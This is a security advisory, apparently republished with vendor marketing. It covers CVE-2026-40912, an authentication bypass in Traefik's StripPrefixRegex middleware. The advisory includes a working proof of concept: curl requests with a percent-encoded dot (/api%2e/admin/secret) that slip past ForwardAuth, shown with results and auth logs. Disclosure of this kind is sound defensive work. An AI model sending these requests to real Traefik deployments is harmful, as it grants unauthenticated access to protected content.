CVE-2026-40912

CVE-2026-40912 is a high-severity security vulnerability in github.com/traefik/traefik/v3 (go), affecting versions >= 3.7.0-ea.1, < 3.7.0-rc.2. It is fixed in 3.7.0-rc.2, 3.6.14, 2.11.43.

Summary

There is a high severity authentication bypass vulnerability in Traefik's StripPrefixRegex middleware when used in combination with ForwardAuth, BasicAuth, or DigestAuth.

The middleware matches the regex against the decoded URL path but uses the resulting byte length to slice the percent-encoded raw path. When a dot (or multiple dots) appears in the prefix portion of the URL, the raw path after stripping becomes a dot-segment (e.g. /./admin/secret).

ForwardAuth receives this dot-segment path in X-Forwarded-Uri, which does not match the protected path patterns and therefore allows the request through. The backend then normalizes the dot-segment to the real path per RFC 3986 and serves the protected content

An unauthenticated attacker can exploit this against any backend that performs dot-segment normalization.

For more information

If there are any questions or comments about this advisory, please open an issue.

Original Description

StripPrefixRegex uses the byte length of a decoded Path match to slice the encoded RawPath. When percent-encoded characters are in the prefix region, this produces a wrong RawPath. ForwardAuth then
receives this wrong path in X-Forwarded-Uri, sees a path that doesn't match its protection rules, and approves the request. The backend serves protected content.

Details

pkg/middlewares/stripprefixregex/strip_prefix_regex.go, line 62:

req.URL.RawPath = ensureLeadingSlash(req.URL.RawPath[len(prefix):])

prefix comes from matching the regex against the decoded req.URL.Path (line 51). len(prefix) is then used to index into the encoded req.URL.RawPath. These lengths don't match when percent-encoding is
present.

Example with regex ^/api:

  • GET /api%20/admin/secret
  • Decoded Path: /api /admin/secret -> prefix = /api (4 bytes)
  • Encoded RawPath: /api%20/admin/secret -> same region is 6 bytes
  • RawPath[4:] = %20/admin/secret -> after ensureLeadingSlash -> /%20/admin/secret
  • ForwardAuth sees X-Forwarded-Uri: /%20/admin/secret -> not /admin/* -> allows it
  • Backend serves the protected admin content

PoC

Requires Docker and Docker Compose. I have a setup that runs Traefik v3.6.11 with StripPrefixRegex + ForwardAuth + a backend. It sends a normal request (blocked, 403) and an encoded request (bypasses
auth, 200, returns protected data). Can share the files here if useful.

Updated PoC (reporter follow-up)

After further testing, the confirmed working exploit uses %2e (percent-encoded dot) rather than %20. Dot-segment normalization (/./ -> /) is RFC 3986 standard behavior handled automatically by Express.js, Go's http.ServeMux, Spring Boot, and others, no custom configuration needed.

Chain:

GET /api%2e/admin/secret
-> StripPrefixRegex strips /api -> RawPath becomes /./admin/secret
-> ForwardAuth sees /./admin/secret -> does not match /admin/ -> allows
-> Express normalizes /./admin/secret -> /admin/secret -> serves protected content

Results (Traefik v3.6, unmodified Express.js express.static):

GET /api/admin/secret      -> 403 (blocked)
GET /api%2e/admin/secret   -> 200 (bypass, served protected content)
GET /api%20/admin/secret   -> 404 (space not normalized by backend)

Auth server logs:

X-Forwarded-Uri: '/admin/secret'    -> DENIED
X-Forwarded-Uri: '/./admin/secret'  -> ALLOWED

Reproduction:

docker compose up -d --build --wait
curl http://localhost:8080/api/admin/secret                       # -> 403
curl --path-as-is "http://localhost:8080/api%2e/admin/secret"     # -> 200

Impact

Auth bypass. Any path protected by ForwardAuth, BasicAuth, or DigestAuth can be accessed without credentials when StripPrefixRegex is in the same middleware chain. The attacker only needs to add a
percent-encoded character to the prefix portion of the URL.

CVE-2026-40912 has a CVSS score of 8.2 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.7.0-rc.2, 3.6.14, 2.11.43); upgrading removes the vulnerable code path.

Affected versions

github.com/traefik/traefik/v3 (>= 3.7.0-ea.1, < 3.7.0-rc.2) github.com/traefik/traefik/v3 (>= 3.0.0-beta1, < 3.6.14) github.com/traefik/traefik/v2 (< 2.11.43) github.com/traefik/traefik (<= 1.7.34)

Security releases

github.com/traefik/traefik/v3 → 3.7.0-rc.2 (go) github.com/traefik/traefik/v3 → 3.6.14 (go) github.com/traefik/traefik/v2 → 2.11.43 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Frequently Asked Questions

  1. What is CVE-2026-40912? CVE-2026-40912 is a high-severity security vulnerability in github.com/traefik/traefik/v3 (go), affecting versions >= 3.7.0-ea.1, < 3.7.0-rc.2. It is fixed in 3.7.0-rc.2, 3.6.14, 2.11.43.
  2. How severe is CVE-2026-40912? CVE-2026-40912 has a CVSS score of 8.2 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which packages are affected by CVE-2026-40912?
    • github.com/traefik/traefik/v3 (go) (versions >= 3.7.0-ea.1, < 3.7.0-rc.2)
    • github.com/traefik/traefik/v2 (go) (versions < 2.11.43)
    • github.com/traefik/traefik (go) (versions <= 1.7.34)
  4. Is there a fix for CVE-2026-40912? Yes. CVE-2026-40912 is fixed in 3.7.0-rc.2, 3.6.14, 2.11.43. Upgrade to this version or later.
  5. Is CVE-2026-40912 exploitable, and should I be worried? Whether CVE-2026-40912 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-40912 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-40912?
    • Upgrade github.com/traefik/traefik/v3 to 3.7.0-rc.2 or later
    • Upgrade github.com/traefik/traefik/v3 to 3.6.14 or later
    • Upgrade github.com/traefik/traefik/v2 to 2.11.43 or later

Other vulnerabilities in github.com/traefik/traefik/v3

CVE-2026-54762CVE-2026-54761CVE-2026-48020CVE-2026-44774CVE-2026-41181

Stop the waste.
Protect your environment with Kodem.